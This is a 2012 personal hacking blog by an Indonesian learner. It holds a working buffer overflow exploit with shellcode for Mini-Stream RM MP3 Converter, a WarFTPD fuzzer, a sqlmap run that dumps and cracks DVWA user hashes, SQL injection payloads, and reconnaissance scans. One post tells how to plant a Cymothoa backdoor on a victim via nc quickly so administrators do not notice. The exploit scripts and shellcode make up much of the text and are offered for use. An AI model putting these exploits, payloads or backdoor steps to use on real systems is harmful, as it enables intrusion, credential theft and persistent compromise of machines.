Minggu, 12 Februari 2012

exploitation local exploit MP3 Converter

now i try again to buffer overflow RM MP3, in this step to check buffer i use 3 code to make buffer the first make 10000 string caracter, the second 20000 caracter, third 30000 caracter, i will try one by one to know how many caracter i need to make buffer RM MP3.
in this job i use:
OllyDBG
Mini Stream RM MP3 Conveter
exploit make it by my self
file to buffer made by myself
ok lets begin try to buffer, start to 10000 character no buffer :'(, second try 20000 character, yupp,, buffer, try again with 30000 character, yupp,, buffer again, boom boom buffer

now i search on how many byte eip can buffer, i create string pattern 20000 character to known how byte need to go EIP and ESP. yupp got it boom crash again :D, now we will take EIP and ESP, EIP on root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb 0x36695735 20000
17417 <=
ESP: root@cupenk:/pentest/exploits/framework/tools# ./pattern_offset.rb i8W 20000
17425
ok next make program again to finding JMP ESP
i will create on EIP character DADADADA
yupp.. created.. 
#!usr/bin/python
file="eip.m3u"
junk="http://"+"\x90" * 17417
junk+="\xDA\xDA\xDA\xDA"
file=open(file,'w')
file.write(junk)
print ("success idiot")
file.close()

now i will find create ESP: gotcha,, has created on esp CACACACACA :d
now i will find JMP ESP although shell.32, yup get it JMP ESP on 7C9D30D7:
after checked and binggo JMP ESP has get it now i will create the exploit
now i will create the exploit, i use my payload for exploitation before
#!usr/bin/python
file="exploit.m3u"
junk="http://"+"\x90" * 17417
junk+="\xD7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print ("success idiot")
file.close()
binggo crash,, crash,, crash,, now i will try telnet to victim:
gotcha,, let dance dance dance hahaa,,, done done done under attack.
successs...


buffer overlow RM MP3

now i learn again buffer overflow, now i make buffer RM MP3, to make buffer i make file with perl script:

my $file= "crash2.m3u";
my $junk= "\x41" x 30000; => this i change to know how many caracter to buffer
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";

now i run this script to make file crash2.m3u then next step crash file will run on MP3 Converter
when i run on aplication RM MP3 nothing crash, i've fail but no problem i try make file with other script i make him from script exploitdb:

my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26121;

open(MYFILE,'>>asu.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

then i run this perl script and next i run file to RM MP3 and tara tara,, boom,, crash i dont know what happen on my script before. and i must know it.. RM MP3 buffer on 20000 and 30000
now i change character A with character i make it with pattern create.
now i try again what happen next 










i feel something wrong in there, but i will try again, so keept move on,,
now to create exploit i must know where
to get EIP need data 17417 byte, and go to stack need 17425
now i will write on EIP DADADADA
so i will write to syntax:

my $Header = "#EXTM3U\n";
my $ex="http://"."\x90" x 17417;
my $ex1="\xDA\xDA\xDA\xDA";
open (MYFILE,'>>b.m3u');

print MYFILE $Header.$ex.$ex1;

close(MYFILE);
yeaaa,, overwrite to EIP DADADADA so i get EIP, 
but to write len on perl i dont know,, haha,, so skip this step to check EIP has got it i write EIP code with ESP JMP.






now i will write code again to make exploitation on windows, oh no i do something wrong my payload can't work: i've problem with payload again

file="fuck3.m3u"
junk="http://"+"\x90"* 17417
junk+="x\D7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\x2b\xc9\xbe\x60\xbb\x9e\xe2\xda\xdf\xd9\x74\x24\xf4\x58\xb1\x51"
"\x83\xc0\x04\x31\x70\x0c\x03\x10\xb7\x7c\x17\x2c\xad\x6b\x95\x24"
"\xcb\x93\xd9\x4b\x4c\xe7\x4a\x97\xa9\x7c\xd7\xeb\x3a\xfe\xdd\x6b"
"\x3c\x10\x56\xc4\x26\x65\x36\xfa\x57\x92\x80\x71\x63\xef\x12\x6b"
"\xbd\x2f\x8d\xdf\x3a\x6f\xda\x18\x82\xba\x2e\x27\xc6\xd0\xc5\x1c"
"\x92\x02\x0e\x17\xff\xc0\x11\xf3\xfe\x3d\xcb\x70\x0c\x89\x9f\xd9"
"\x11\x0c\x4b\xe6\x05\x85\x02\x84\x71\x85\x75\x97\x4b\x6e\x11\x9c"
"\xef\xa0\x51\xe2\xe3\x4b\x15\xfe\x56\xc0\x96\xf6\xf6\xbf\x98\x48"
"\x09\xac\xf5\xab\xc3\x4a\xa5\x35\x84\xa1\x7b\xd1\x23\xb5\x49\x7e"
"\x98\xc6\x7e\xe8\xeb\xd4\x83\xd3\xbb\xd9\xaa\x7c\xb5\xc3\x35\x03"
"\x28\x03\xb8\x56\xd9\x16\x43\x88\x75\xce\xb2\xdd\x2b\xa7\x3b\xcb"
"\x67\x1b\x97\xa0\xd4\xd8\x44\x05\x88\x21\xba\xef\x46\xcf\x67\x89"
"\xc5\x66\x76\xc0\x82\xdc\x63\x9a\x95\x4a\x6b\x8c\x70\x65\xc2\x65"
"\x7a\x55\x8c\x21\x29\x78\xa4\x7e\xcd\x53\x65\xd5\xce\x8c\xe2\x30"
"\x79\xab\xba\xed\x85\x65\x6c\x45\x2e\xdf\x72\xb5\x5d\xb7\x6b\x4c"
"\xa4\x31\x23\x51\xfe\x97\x34\x7d\x99\x7d\xaf\x1b\x0e\xe1\x42\x6a"
"\x2b\x8f\xcc\x35\x9d\x9c\x64\x22\xb7\x58\xfe\x4e\x79\xa1\xf3\x24"
"\x84\x63\xd9\xc6\x3b\x48\xb2\xbb\xc6\xa8\x1f\x68\x9d\xa1\x2d\x90"
"\x51\x27\x2d\x19\xd2\xb7\x07\xba\x8d\x15\xf9\x6d\x63\xf0\xf8\xdc"
"\xd2\x51\xaa\x21\x04\x31\xe1\x04\xa0\x0c\xaa\x49\x7d\xfa\xb2\x4a"
"\xb5\x04\x9c\x3f\xed\x06\x9e\xfb\x76\x08\x77\x51\x88\x26\x10\xa5"
"\xfc\xc3\xbe\x16\xfe\x1a\xbf\x48")
file=open(file,'w')
file.write(junk)
print("success")
file.close()

Jumat, 10 Februari 2012

download

http://www.mediafire.com/?w77a06erasgs6nl

exploitation development > warftpd

this next step i learn about buffer overflow, in this step i try to exploit windows xp3 through buffer overflow vuln. in learn this method i need aplication WarFTPD, Metasploit, OllyDBG, to get vuln need fuzzer, i use fuzzer write by mrp.bpp he is my guru's:

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.9.239',21)) > ip target
data=s.recv(1024)
print("sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
this program has set to ip victim is 192.168.9.239, now i try run this..
no.. i've fail, my warftpd can't run when i run on ollydbg, i hope i can solve this problem

Kamis, 09 Februari 2012

buffer overflow

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.

While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or buffer overflow, since the extra two bytes of data will overflow and spill out of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The overflow_example.c code offers an example
 

int main(int argc, char *argv[]) {
   int value = 5;
   char buffer_one[8], buffer_two[8]; 
 
reference:art of exploitation 2nd edition 

Dumping Database

if we attacking system through sqlvuln, we must know where vuln to be found, for that we need application wich checking vuln mysql. i use 2 aplication sqlmap, and burpsuite. lets begin to attack, in my article i use simulation use dvwa, this simulation i be user and search database and i will dump that. ok now lets begin, i run burpsuite and open dvwa website to mybrowser with port proxy 8080,
i get "GET /dvwa/vulnerabilities/sqli/?id=%27or+1%3D1%23&Submit=Submit" and "Cookie: security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0".
now i test it use sqlmap:
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0"

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:15:52

[20:15:52] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:15:52] [INFO] testing connection to the target url
[20:15:52] [INFO] testing if the url is stable, wait a few seconds
[20:15:53] [INFO] url is stable
[20:15:53] [INFO] testing if GET parameter 'id' is dynamic
[20:15:53] [WARNING] GET parameter 'id' appears to be not dynamic
[20:15:53] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[20:15:53] [INFO] testing sql injection on GET parameter 'id'
[20:15:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:15:53] [INFO] heuristics detected web page charset 'ascii'
[20:15:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:15:53] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[20:15:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:15:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:16:04] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[20:16:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:04] [INFO] target url appears to be UNION injectable with 2 columns
[20:16:04] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[20:16:06] [INFO] testing if GET parameter 'Submit' is dynamic
[20:16:06] [WARNING] GET parameter 'Submit' appears to be not dynamic
[20:16:06] [WARNING] heuristic test shows that GET parameter 'Submit' might not be injectable
[20:16:06] [INFO] testing sql injection on GET parameter 'Submit'
[20:16:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:16:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[20:16:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:16:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:16:11] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 136 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:16:11] [INFO] manual usage of GET payloads requires url encoding
[20:16:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:11] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:16:11

now i check the database
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" --dbs

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:16:35

[20:16:35] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:16:35] [INFO] resuming injection data from session file
[20:16:35] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:16:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:16:35] [INFO] manual usage of GET payloads requires url encoding
[20:16:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:16:35] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[20:16:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:16:35

i get the database now how i can dump it?
sqlmap.py: error: no such option: --D
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -D dvwa --tables

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:20:59

[20:20:59] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:20:59] [INFO] resuming injection data from session file
[20:20:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:20:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:20:59] [INFO] manual usage of GET payloads requires url encoding
[20:20:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:20:59] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[20:20:59] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:20:59

target dump "users"
root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0" -T users --dump

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:38:37

[20:38:37] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[20:38:37] [INFO] resuming injection data from session file
[20:38:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:38:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 233 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,111,104,58),(SELECT (CASE WHEN (233=233) THEN 1 ELSE 0 END)),CHAR(58,106,108,120,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eSbn'='eSbn&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,120,111,104,58),IFNULL(CAST(CHAR(83,118,69,106,87,85,98,113,65,66) AS CHAR),CHAR(32)),CHAR(58,106,108,120,58))# AND 'dMOG'='dMOG&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'Nhlt'='Nhlt&Submit=Submit
---

[20:38:37] [INFO] manual usage of GET payloads requires url encoding
[20:38:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[20:38:37] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[20:38:37] [INFO] fetching current database
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa
[20:38:37] [INFO] fetching columns for table 'users' on database 'dvwa'
[20:38:37] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': user_id, int(6), first_name, varchar(15), last_name, varchar(15), user, varchar(15), password, varchar(32), avatar, varchar(70)
[20:38:38] [INFO] fetching entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[20:38:40] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[20:38:42] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[20:38:44] [INFO] starting dictionary attack (md5_generic_passwd)
[20:38:44] [INFO] found: 'abc123' for user: 'gordonb'                         
[20:38:45] [INFO] found: 'charley' for user: '1337'                           
[20:38:45] [INFO] found: 'letmein' for user: 'pablo'                          
[20:38:46] [INFO] found: 'password' for user: 'admin'                         
[20:39:09] [INFO] 4159708/10006596 words (42%)
Database: dvwa                                                                
Table: users
[5 entries]
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| avatar                                           | first_name | last_name | password                                    | user    | user_id |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+
| http://127.0.0.1/dvwa/hackable/users/pablo.jpg   | Pablo      | Picasso   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | pablo   | 4       |
| http://127.0.0.1/dvwa/hackable/users/gordonb.jpg | Gordon     | Brown     | e99a18c428cb38d5f260853678922e03 (abc123)   | gordonb | 2       |
| http://127.0.0.1/dvwa/hackable/users/admin.jpg   | admin      | admin     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin   | 1       |
| http://127.0.0.1/dvwa/hackable/users/smithy.jpg  | Bob        | Smith     | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | smithy  | 5       |
| http://127.0.0.1/dvwa/hackable/users/1337.jpg    | Hack       | Me        | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | 1337    | 3       |
+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

[20:39:42] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[20:39:42] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 20:39:42

Rabu, 08 Februari 2012

SQL Injection & Blind SQL Injection

A SQL injection attack consists of insertion or injection of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation of the statements performed on the database by the end-user of the application.

The following line of code illustrates this vulnerability
statement = "SELECT * FROM users WHERE name = '" + userName + "';"

This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable a
' or '1'='1
Or using comments to even block the rest of the query (there are three types of SQL comments)
' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '
 


Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

reference: http://en.wikipedia.org/wiki/SQL_injection

Senin, 06 Februari 2012

backdooring with nc and cymothoa

on this article i try explain about backdooring with nc and cymothoa. this step do in hacking technique if we've done attack to system. install backodoor to victim should not be more 5 minute after done attacking. if more than you will fail, system administrator known what you do.
u can install backdoor cymonthoa used nc, run command on vicitm system #nc -l -p 212 > cymothoa if done after that run nc too on your system for transfer cymonthoa root@cupenk:/pentest/backdoors/cymothoa# nc 192.168.0.135 212 < cymothoa
if done change priv access cymonthoa on victim #chmod +rwx cymohoa

privilage escallation webmin vuln


hacking on weekend, how we can getting the system?? to get it we must follow the rule of hacking.
First step what should I do? Yea,, great information gathering for first step.
root@cupenk:~# netdiscover

Currently scanning: 192.168.48.0/16 | Screen View: Unique Hosts
91 Captured ARP Req/Rep packets, from 10 hosts. Total size: 5460
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.0.40 10:78:d2:36:65:a4 10 600 Unknown vendor
192.168.0.99 60:eb:69:06:22:ec 17 1020 Unknown vendor
192.168.0.137 00:23:8b:f6:c6:b7 11 660 Unknown vendor
192.168.0.21 08:00:27:f9:c1:bb 19 1140 CADMUS COMPUTER SYSTEMS
192.168.0.89 00:1d:72:1a:56:9c 10 600 Wistron Corporation
192.168.0.104 f4:6d:04:81:f9:39 10 600 Unknown vendor
192.168.0.105 00:1d:72:0d:bb:13 11 660 Wistron Corporation
192.168.0.90 70:5a:b6:17:33:40 01 060 Unknown vendor
192.168.0.98 00:26:22:9b:ac:54 01 060 Unknown vendor
192.168.0.138 00:23:5a:ef:0d:a2 01 060 Unknown vendor

virtualbox system has detected to my system, on this virtualbox has installed server.
Next I scanning, any service running in there?
root@cupenk:~# nmap -Pn -v -A -sS 192.168.0.21

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 17:13 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 17:13
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 17:13, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:13
Completed Parallel DNS resolution of 1 host. at 17:13, 13.00s elapsed
Initiating SYN Stealth Scan at 17:13
Scanning 192.168.0.21 [1000 ports]
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 17:13, 0.13s elapsed (1000 total ports)
Initiating Service scan at 17:13
Scanning 5 services on 192.168.0.21
Completed Service scan at 17:13, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 17:13
Completed NSE at 17:13, 1.02s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00059s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.001 days (since Sat Feb 4 17:12:22 2012)
Network Distance: 1 hop
